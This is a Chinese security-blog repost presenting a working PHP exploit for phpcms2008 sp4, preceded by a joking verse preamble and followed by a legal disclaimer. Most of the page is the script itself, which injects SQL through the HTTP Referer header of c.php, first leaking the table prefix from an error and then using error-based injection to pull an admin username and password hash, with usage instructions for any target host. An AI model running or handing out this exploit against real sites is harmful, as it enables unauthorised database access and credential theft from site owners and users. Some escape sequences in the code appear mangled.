phpcms2008 最新注入 exp

暗月博客
暗月博客
暗月博客
809
文章
0
评论
2019年11月21日18:09:24评论369 views字数 2155阅读7分11秒阅读模式
摘要

春雨绵绵 无心睡眠 唔阅周章 五指一算 唔命不久矣。        十年苦读寒窗,终究成何物。

春雨绵绵 无心睡眠 唔阅周章 五指一算 唔命不久矣。

        十年苦读寒窗,终究成何物。

文采不行。该学习吹bb看论语才行。。。。。。。。。。。。。。

                    囧。。。。。。。。。。。。。。。

囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。

囧。。。。。。。。。。。。。。。

囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。

囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。 囧。。。。。。。。。。。。。。。

<?php  print_r ( " +---------------------------------------+ title:phpcms2008 sp4 c.php exploit mail:[email protected] blog:www.moonhack.org bbs:www.xinyues.org data:2013.3.28  +---------------------------------------+/n " ); if ($argc < 2) { print_r ( " +---------------------------------------+ target: php $argv[0] www.target.com  php $argv[0] www.target.com /phpcms2008/ +---------------------------------------+/n " ); exit (); } error_reporting ( E_ALL ); ini_set ( 'max_execution_time', '0' ); function send_http($host, $prot, $referer) {  $data = "";  $fp = @fsockopen ( $host, $prot, $errno, $errstr, 30 );  if (! $fp) {   exit ( "$host Connection failed" );  } else {      fwrite ( $fp, $referer );   while ( ! feof ( $fp ) ) {    $data .= fgets ( $fp, 128 );   }   fclose ( $fp );   return $data;  }  } $host = $argv [1]; $prot = "80"; $patch = isset ( $argv [2] ) ? $argv [2] : ""; $sql = "fuck'";  $prefix = http ( $host, $prot, $sql, $patch ); function http($host, $prot, $sql, $patch) {  $preg = '/INSERT INTO `(.*)ads_/';  $prefix = '';  $referer = "GET /$patch" . "c.php?id=1 HTTP/1.1/r/n";  $referer .= "Host: $host/r/n";  $referer .= "REFERER: $sql/r/n";  $referer .= "Connection: Close/r/n/r/n";  $data = send_http ( $host, $prot, $referer );  $data ;  preg_match ( $preg, $data, $prefix );  if (! $prefix) {  exit ( "fail/r/n" );  }  print ("prefix:$prefix[1]") ;  return $prefix [1]; }  $exp = http2 ( $host, $prot, $patch, $prefix ); function http2($host, $prot, $patch, $prefix) {  $preg = '//'~/'(.*):(.*)/'~1/'/';  $sql2 = $sqlstring = "fuck'),('a','123','123','123',(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from " . $prefix . "member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a))#";  $referer = "GET /$patch" . "c.php?id=1 HTTP/1.1/r/n";  $referer .= "Host: $host/r/n";  $referer .= "REFERER: $sql2/r/n";  $referer .= "Connection: Close/r/n/r/n";  $data = send_http ( $host, $prot, $referer );  preg_match ( $preg, $data, $exp );  if (! $exp) {   exit ( "fail/r/n" );  }  return $exp; } print_r ( " success:$host username:$exp[1] password:$exp[2] " ); ?>

phpcms2008 最新注入 exp

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日18:09:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   phpcms2008 最新注入 exphttps://cn-sec.com/archives/70908.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息